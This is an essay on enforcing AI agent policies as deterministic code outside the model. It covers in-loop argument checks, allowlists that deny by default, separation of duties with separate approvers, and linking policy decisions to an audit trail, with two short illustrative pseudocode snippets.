Policy enforcement — a policy a model can talk its way around is not a control.
Every team writes an agent policy: don't touch production data, get approval over a threshold, never email external parties. Almost every team then "enforces" it by putting it in the system prompt — which makes it a strong suggestion to a non-deterministic optimizer that an adversary is actively trying to redirect. A control is something a model cannot decline. This essay is about turning policy into code, choosing where in the agent loop to enforce it, and the structural patterns — allowlists, separation of duties — that hold when the model is wrong or compromised.
Policy-as-code: the rule is evaluated, not interpreted.
The first move is to take the policy out of natural language and into an executable artifact that runs outside the model: a function, a rules engine, a policy language like the kind used for cloud authorization. The agent proposes an action; a deterministic evaluator returns allow or deny before anything happens. This buys three things prompt-based "policy" can never have: it is auditable (the rule is a versioned, reviewable object, not buried in a prompt), testable (you can assert deny on the dangerous cases in CI), and non-bypassable by persuasion (no wording of a malicious instruction changes the output of a function).
# the model proposes; a deterministic evaluator decides decision = policy.evaluate( action=proposed_tool_call, principal=ctx.principal, context=ctx, ) if decision.effect != "allow": return Denied(decision.reason) # fail closed
Keep the policy engine separate from the agent code and version it independently. "Which policy was in force when this ran" must be answerable from the audit record (C1) by id, not by reading old prompts.
Enforce in three places: before, inside, and after the loop.
There is no single chokepoint, because different risks live at different stages. Pre-loop: admission — is this principal allowed to run this agent at all, with what data scope and budget. In-loop: the high-leverage layer — every tool call is checked against policy before execution, with arguments inspected, not just the tool name (the difference between "may call the DB tool" and "may run DELETE"). Post-loop: egress — inspect the agent's output and any outbound payload before it leaves the trust boundary, because a correct sequence of allowed calls can still assemble a disallowed result, like exfiltrating data into a "summary".
- Pre bounds the blast radius before the model runs — scope, budget, data domain.
- In-loop is where autonomy actually does damage — argument-level checks on every effectful call.
- Post catches emergent violations no single step tripped — the assembled outcome, not the steps.
Allowlist, never blocklist.
A blocklist enumerates forbidden actions and permits everything else; for an open-ended generator that invents action sequences, the set of harmful things you didn't think of is unbounded, so a blocklist fails open. An allowlist enumerates permitted tools, permitted argument shapes, permitted destinations, and denies by default — the unanticipated action is refused because it was never granted, not because someone predicted it. This is the single highest-leverage structural decision in agent policy and it must be the default posture at every enforcement point: deny unless explicitly allowed.
A blocklist of "bad" tool calls is security theater against a model an attacker can prompt-inject. The unsafe default — allow-then-block — means your safety depends on having predicted the attack.
Separation of duties: no single agent closes the loop on a sensitive action.
For high-consequence operations, borrow the oldest control in finance: the entity that proposes an action cannot be the entity that approves and commits it. An agent may draft a payment, a deletion, a production change; a separate authority — a different service with different credentials, a second agent with a narrow verifier role, or a human (the operator role developed in C4) — must approve before the effect lands. This means a single compromised or hallucinating agent cannot unilaterally cause the worst outcome; the attacker now has to defeat two independently-scoped controls.
# proposer and approver are different principals draft = agent.propose("refund", amount=9000) if draft.amount > 5000: approval = approver.review(draft) # separate authority + creds assert approval.granted_by != draft.proposed_by commit.apply(draft, approval)
Tie enforcement to the audit trail, both ways.
Enforcement and audit are one system. Every policy decision — allow and deny — must be written to the C1 trail with the rule id, the inputs evaluated, and the outcome, so "why was this blocked" and "why was this permitted" are both answerable later. Denials are the more valuable signal: a rising deny rate on a path is an early indicator of a misbehaving agent, a prompt-injection campaign, or a policy that is wrong for the real workload. Enforcement without audit cannot be reviewed; audit without enforcement only records the damage.
The honest tradeoff.
Hard enforcement has a real cost: every gate is latency and engineering, an overtight allowlist generates false denials that push users toward shadow workarounds, and a separate policy engine is another system to keep correct and in sync. But the alternative — policy that lives only in a prompt — is not a weaker control, it is the absence of a control wearing the costume of one. Enforce the rules that protect against irreversible or regulated harm in code outside the model; let prompt guidance handle only what a violation would merely make slightly worse.